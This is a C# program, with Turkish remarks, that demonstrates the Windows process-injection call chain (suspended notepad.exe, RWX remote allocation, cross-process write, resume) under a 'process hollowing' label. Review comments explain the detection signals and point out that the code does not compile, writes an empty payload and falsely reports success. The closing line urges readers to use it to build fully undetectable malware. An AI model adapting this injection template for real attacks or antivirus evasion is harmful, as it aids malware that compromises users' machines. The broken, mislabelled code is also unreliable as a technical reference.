Not: bu kod her detayda // ile örneklendirilmiştir.
Bu kod eğitim amaçlıdır, iyi günler dilerim!
using System;
bu kod eğitim amaçlıdır iyi günler dilerim !
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
class Program
{
// Demonstrates the Win32 API chain that endpoint telemetry associates with process
// injection: CreateProcess(CREATE_SUSPENDED) -> VirtualAllocEx(RWX) -> WriteProcessMemory
// -> ResumeThread. For defenders, the observable pattern is a parent that spawns a
// suspended child, allocates read/write/execute memory in it and writes into it.
// NOTE(review): despite the "hollowing" label, nothing in this listing unmaps the child's
// image or redirects its execution; ResumeThread only resumes notepad's original thread.
// Windows API calls
// NOTE(review): Win32 CreateProcess returns BOOL, but it is declared here as IntPtr while
// Main assigns the result to a bool, so the file does not compile as written. No CharSet
// is specified, so DllImport binds the ANSI entry point (CreateProcessA).
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CreateProcess(string lpApplicationName, string lpCommandLine,
IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles,
uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
// Declared but never called anywhere in this listing.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, uint dwSize, out IntPtr lpNumberOfBytesRead);
// Cross-process memory write; this is the call detection logic keys on.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, uint dwSize, out IntPtr lpNumberOfBytesWritten);
// Remote allocation in the target process; returns IntPtr.Zero on failure.
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, uint flAllocationType, uint flProtect);
// NOTE(review): Win32 ResumeThread returns a DWORD (the previous suspend count, or
// (DWORD)-1 on failure); marshaling it as bool cannot distinguish failure from success.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ResumeThread(IntPtr hThread);
// Structures and constants
// dwCreationFlags bit: the child's primary thread starts suspended.
const uint CREATE_SUSPENDED = 0x00000004;
// flAllocationType for VirtualAllocEx: commit the pages.
const uint MEM_COMMIT = 0x1000;
// flProtect: readable, writable AND executable. A cross-process RWX allocation is a
// high-signal indicator that many EDR policies flag or block outright.
const uint PAGE_EXECUTE_READWRITE = 0x40;
// Sequential mirror of Win32 STARTUPINFO; only passed by ref to CreateProcess.
// NOTE(review): the cb field is never set by Main, so it stays 0 — confirm this is intended.
[StructLayout(LayoutKind.Sequential)]
struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public ushort wShowWindow;
public ushort cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
// Handles and ids filled in by CreateProcess. hProcess and hThread are never released
// with CloseHandle anywhere in this listing (handle leak).
[StructLayout(LayoutKind.Sequential)]
struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
// Entry point: starts a suspended notepad.exe, allocates RWX memory in it and writes an
// empty buffer there. The results of WriteProcessMemory and ResumeThread are never checked,
// so the closing "başarılı" message is printed regardless of what actually happened.
static void Main(string[] args)
{
string targetProcess = @"C:\Windows\System32\notepad.exe"; // process used as the injection target
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// Start notepad.exe suspended. Telemetry view: this program becomes notepad's parent and
// the child sits suspended until the ResumeThread call below.
bool result = CreateProcess(targetProcess, null, IntPtr.Zero, IntPtr.Zero, false,
CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
if (!result)
{
Console.WriteLine("Process başlatılamadı.");
return;
}
// Payload buffer. This listing supplies no bytes, so payload.Length is 0.
byte[] payload = new byte[] { /* placeholder: no bytes are provided in this listing */ };
// Allocate RWX memory in the child. With an empty payload dwSize is 0, which
// VirtualAllocEx is expected to reject, so the failure branch below is what runs as written.
IntPtr allocatedMemory = VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)payload.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// NOTE(review): on this path the suspended child is neither terminated nor resumed,
// leaving an orphaned suspended notepad.exe behind — a visible forensic artifact.
if (allocatedMemory == IntPtr.Zero)
{
Console.WriteLine("Bellek ayırma işlemi başarısız.");
return;
}
// Cross-process write of the buffer; both the bool result and bytesWritten are ignored.
IntPtr bytesWritten;
WriteProcessMemory(pi.hProcess, allocatedMemory, payload, (uint)payload.Length, out bytesWritten);
// Resume the child's original primary thread. Nothing in this listing transfers control
// to the written buffer, and the return value is ignored.
ResumeThread(pi.hThread);
// Unconditional: does not reflect whether any of the preceding calls succeeded.
Console.WriteLine("Process hollowing başarılı!");
}
}
BUNLAN FUD BİLE YAPABİLRİSİNİZ O KADAR RİSKLİ BİŞEY İYİ DENEMELER EFENDİM!